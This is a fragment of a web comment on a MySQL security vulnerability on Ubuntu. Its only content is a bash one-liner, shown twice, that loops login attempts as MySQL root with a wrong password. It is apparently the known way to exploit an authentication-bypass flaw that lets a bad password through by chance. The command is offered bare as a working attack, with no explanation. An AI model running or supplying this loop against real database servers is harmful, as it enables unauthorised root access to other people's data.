Comment on Security vulnerability in MySQL ubuntuComments−_hnwo14ywhile true; do mysql -u root mysql --password=fail; done
Comments
while true; do mysql -u root mysql --password=fail; done